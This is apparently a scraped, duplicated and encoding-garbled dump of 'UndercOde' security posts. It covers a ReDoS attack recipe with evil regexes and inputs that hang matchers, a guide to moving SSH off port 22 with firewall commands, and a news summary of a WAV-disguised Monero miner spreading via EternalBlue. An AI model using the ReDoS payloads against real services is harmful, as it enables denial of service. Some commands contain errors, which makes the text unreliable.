aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
π¦ Web application attack
1) Open a JavaScript
2) find Evil Regex
3) Craft a malicious input for the found Regex
4) Submit a valid value via intercepting proxy
5) Change the request to contain a malicious input
You are done!
π¦ ReDoS via Regex Injection
> The following example checks if the username is part of the password entered by the user.
> String userName = textBox1.Text; String password = textBox2.Text;
>Regex testPassword = new Regex(userName); Match match = testPassword.Match(password); if (match.Success) {
> MessageBox.Show("Do not include name in password."); } else { MessageBox.Show("Good password."); }
> If an attacker enters ^(([a-z])+.)+[A-Z]([a-z])+$ as a username and aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! as a password, the program will hang.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Vulnerable Regex in online repositories Example :
twitter.com/UndercOdeTC
1) ReGexLib,id=1757 (email validation) - see bold part, which is an Evil Regex
^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$
Input:
aaaaaaaaaaaaaaaaaaaaaaaa!
2) OWASP Validation Regex Repository, Java Classname - see bold part, which is an Evil Regex
^(([a-z])+.)+[A-Z]([a-z])+$
Input:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
π¦ Web application attack
1) Open a JavaScript
2) find Evil Regex
3) Craft a malicious input for the found Regex
4) Submit a valid value via intercepting proxy
5) Change the request to contain a malicious input
You are done!
π¦ ReDoS via Regex Injection
> The following example checks if the username is part of the password entered by the user.
> String userName = textBox1.Text; String password = textBox2.Text;
>Regex testPassword = new Regex(userName); Match match = testPassword.Match(password); if (match.Success) {
> MessageBox.Show("Do not include name in password."); } else { MessageBox.Show("Good password."); }
> If an attacker enters ^(([a-z])+.)+[A-Z]([a-z])+$ as a username and aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! as a password, the program will hang.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Linux SECURITY :
> Linux changes SSH default port 22 to prevent password cracking
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
1) On Linux / Unix systems, many people use SSH + password to log in to the server. The default port 22 is the risk of being brute-forced. Random port number.
2) To be on the safe side, it is recommended to first add a random SSH port number and add the corresponding firewall rules, and then try to connect to the server with this new port. If it is OK, we will delete the default port 22.
3) The advantage of this is that if the newly modified port number fails to connect, you can still use the default 22 port to log in, otherwise, you may not be able to connect or you may not be able to connect to the server through SSH after some problems, which is miserable.
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Linux SECURITY :
> Linux changes SSH default port 22 to prevent password cracking
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
1) On Linux / Unix systems, many people use SSH + password to log in to the server. The default port 22 is the risk of being brute-forced. Random port number.
2) To be on the safe side, it is recommended to first add a random SSH port number and add the corresponding firewall rules, and then try to connect to the server with this new port. If it is OK, we will delete the default port 22.
3) The advantage of this is that if the newly modified port number fails to connect, you can still use the default 22 port to log in, otherwise, you may not be able to connect or you may not be able to connect to the server through SSH after some problems, which is miserable.
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ First, modify the configuration file
T.me/UndercOdeTesting
1) Modify the configuration file / etc / ssh / sshd_config
vim / etc / ssh / sshd_config
modify
#Port 22
#ListenAddress 0.0.0.0
#ListenAddress ::
for
Port 22
Port 23456
#ListenAddress 0.0.0.0
#ListenAddress ::
2) As above, uncomment Port 22 and add a line below it Port 23456
3) The default listening port of SSH is 22, if it is not mandatory, "Port 22" is commented or uncommented, port 22 remote login will be opened by default.
> The above is uncommented and port 22 is reserved to prevent possible permissions and configuration problems that cause port 22 to be inaccessible, which is awkward.
4) Added a line of Port 23456, which is to replace the default port 22. When you modify the port, you should choose a port number between 10000 and 65535. Below 10000 is easy to be occupied by the system or some special software, or newly installed Applications may occupy this port, so do not use port numbers below 10000.
5) Make the sshd configuration take effect
> Execute the following command to make the sshd configuration take effect.
a) CentOS 7.x or above, execute the command
systemctl restart sshd.service
b) CentOS 6.x or below, execute the command
/etc/init.d/sshd restart
6) After taking effect, log in with the new port number
ssh root@47.106.126.167 -p 23456
# ssh root@47.106.126.167 -p 23456
root@47.106.126.167's password:
7) Enter password to login successfully
Note: At this time, both ports 22 and 23456 can successfully log in to ssh.
8) Confirm that the new port can log in, comment out port 22
vim / etc / ssh / sshd_config
Comment out port 22, the final configuration is as follows
#Port 22
Port 23456
#ListenAddress 0.0.0.0
#ListenAddress ::
10) Finally, do nβt forget to modify the configuration file to make it take effect
11 ) CentOS 7.x or above, execute the command
systemctl restart sshd.service
12) CentOS 6.x or below, execute the command
/etc/init.d/sshd restart
13) Third, the firewall allows new port numbers
When using Cloud example, prior to CentOS 7 and enabling the default firewall iptables, you should note that iptables does not block access by default
14) If you configured iptables rules, you need to execute the command to allow new ports:
iptables -A INPUT -p tcp --dport 23456 -j ACCEPT
15) Then execute the restart firewall command
service iptables restart
> Explanation :
16) Firewalld is installed by default after CentOS 7
First, check if the firewall has opened the port number 23456.
> firewall-cmd --permanent --query-port = 23456 / tcp
17) If the print result is no, it means that the 23456 port number is not open, then add the allow new port number and run the command
> firewall-cmd --permanent --add-port = 23456 / tcp
18) If the result is success, the TCP 23456 port number is released.
Next, reload the firewall policy for the configuration to take effect
> firewall-cmd --reload
19) Finally, check again if port 23456 is open
> firewall-cmd --permanent --add-port = 23456 / tcp
20) If a new port number is opened, yes will be printed at this time
> Fourth, the policy group allows new port numbers
21) any cloud server vendors such as Alibaba Cloud and Tencent Cloud have security group policies. If the firewall opens a new port number, but the security group does not open a new port number, it will not be possible to log in via ssh. Therefore, you need to open a new port number in the security group
21) Log in to the ECS Management Console , locate the instance, select Network and Security Group
22) On the Security Group Rule page, click Add Security Group Rule to define the security rule according to the actual usage scenario and allow the newly configured remote port to connect.
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ First, modify the configuration file
T.me/UndercOdeTesting
1) Modify the configuration file / etc / ssh / sshd_config
vim / etc / ssh / sshd_config
modify
#Port 22
#ListenAddress 0.0.0.0
#ListenAddress ::
for
Port 22
Port 23456
#ListenAddress 0.0.0.0
#ListenAddress ::
2) As above, uncomment Port 22 and add a line below it Port 23456
3) The default listening port of SSH is 22, if it is not mandatory, "Port 22" is commented or uncommented, port 22 remote login will be opened by default.
> The above is uncommented and port 22 is reserved to prevent possible permissions and configuration problems that cause port 22 to be inaccessible, which is awkward.
4) Added a line of Port 23456, which is to replace the default port 22. When you modify the port, you should choose a port number between 10000 and 65535. Below 10000 is easy to be occupied by the system or some special software, or newly installed Applications may occupy this port, so do not use port numbers below 10000.
5) Make the sshd configuration take effect
> Execute the following command to make the sshd configuration take effect.
a) CentOS 7.x or above, execute the command
systemctl restart sshd.service
b) CentOS 6.x or below, execute the command
/etc/init.d/sshd restart
6) After taking effect, log in with the new port number
ssh root@47.106.126.167 -p 23456
# ssh root@47.106.126.167 -p 23456
root@47.106.126.167's password:
7) Enter password to login successfully
Note: At this time, both ports 22 and 23456 can successfully log in to ssh.
8) Confirm that the new port can log in, comment out port 22
vim / etc / ssh / sshd_config
Comment out port 22, the final configuration is as follows
#Port 22
Port 23456
#ListenAddress 0.0.0.0
#ListenAddress ::
10) Finally, do nβt forget to modify the configuration file to make it take effect
11 ) CentOS 7.x or above, execute the command
systemctl restart sshd.service
12) CentOS 6.x or below, execute the command
/etc/init.d/sshd restart
13) Third, the firewall allows new port numbers
When using Cloud example, prior to CentOS 7 and enabling the default firewall iptables, you should note that iptables does not block access by default
14) If you configured iptables rules, you need to execute the command to allow new ports:
iptables -A INPUT -p tcp --dport 23456 -j ACCEPT
15) Then execute the restart firewall command
service iptables restart
> Explanation :
16) Firewalld is installed by default after CentOS 7
First, check if the firewall has opened the port number 23456.
> firewall-cmd --permanent --query-port = 23456 / tcp
17) If the print result is no, it means that the 23456 port number is not open, then add the allow new port number and run the command
> firewall-cmd --permanent --add-port = 23456 / tcp
18) If the result is success, the TCP 23456 port number is released.
Next, reload the firewall policy for the configuration to take effect
> firewall-cmd --reload
19) Finally, check again if port 23456 is open
> firewall-cmd --permanent --add-port = 23456 / tcp
20) If a new port number is opened, yes will be printed at this time
> Fourth, the policy group allows new port numbers
21) any cloud server vendors such as Alibaba Cloud and Tencent Cloud have security group policies. If the firewall opens a new port number, but the security group does not open a new port number, it will not be possible to log in via ssh. Therefore, you need to open a new port number in the security group
21) Log in to the ECS Management Console , locate the instance, select Network and Security Group
22) On the Security Group Rule page, click Add Security Group Rule to define the security rule according to the actual usage scenario and allow the newly configured remote port to connect.
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ from yesterday,NEW BUG
> Guardicore's security researchers have revealed a sophisticated malware attack that successfully destroyed more than 800 devices belonging to mid-sized companies in the medical technology industry. The malware masquerades as a WAV file and contains a Monero mining software that uses the infamous EternalBlue vulnerability to compromise devices on the network.
> The only bug in this malware was that it eventually caused the Blue Screen of Death (BSOD) of the infected computer and displayed the relevant error code, which eventually caused the victim to suspect and triggered an in-depth investigation of the incident.
> Researchers said that BSOD was first discovered on October 14 when the machine at the time of the fatal crash was trying to execute a long command line (actually a base-64 encoded PowerShell script). After decoding the script, the researchers obtained a readable Powershell script that was used to deploy the malware. The script first checks the system architecture (based on pointer size). It then reads the value stored in the above registry subkey and loads the value into memory using the Windows API function WriteProcessMemory. The researchers noted that the malware payload is executed by obtaining and calling function pointer delegates.
> The malware tried to spread to other devices on the network using an EternalBlue-based vulnerability, which is the same vulnerability used by WannaCry in 2017 and infected thousands of computers worldwide. After reverse engineering the malware, the researchers found that the malware actually hides the Monero mining module disguised as a WAV file and uses the CryptonightR algorithm to mine the Monero virtual currency. In addition, the malware utilizes steganography and hides its malicious modules in a clear-looking WAV file. "
> Researchers found that the complete removal of malware, including termination of malicious processes, prevented BSOD from occurring on the victim device.
π¦this post from twitter.com/UndercOdeTC, you can get more updates from their
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ from yesterday,NEW BUG
> Guardicore's security researchers have revealed a sophisticated malware attack that successfully destroyed more than 800 devices belonging to mid-sized companies in the medical technology industry. The malware masquerades as a WAV file and contains a Monero mining software that uses the infamous EternalBlue vulnerability to compromise devices on the network.
> The only bug in this malware was that it eventually caused the Blue Screen of Death (BSOD) of the infected computer and displayed the relevant error code, which eventually caused the victim to suspect and triggered an in-depth investigation of the incident.
> Researchers said that BSOD was first discovered on October 14 when the machine at the time of the fatal crash was trying to execute a long command line (actually a base-64 encoded PowerShell script). After decoding the script, the researchers obtained a readable Powershell script that was used to deploy the malware. The script first checks the system architecture (based on pointer size). It then reads the value stored in the above registry subkey and loads the value into memory using the Windows API function WriteProcessMemory. The researchers noted that the malware payload is executed by obtaining and calling function pointer delegates.
> The malware tried to spread to other devices on the network using an EternalBlue-based vulnerability, which is the same vulnerability used by WannaCry in 2017 and infected thousands of computers worldwide. After reverse engineering the malware, the researchers found that the malware actually hides the Monero mining module disguised as a WAV file and uses the CryptonightR algorithm to mine the Monero virtual currency. In addition, the malware utilizes steganography and hides its malicious modules in a clear-looking WAV file. "
> Researchers found that the complete removal of malware, including termination of malicious processes, prevented BSOD from occurring on the victim device.
π¦this post from twitter.com/UndercOdeTC, you can get more updates from their
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β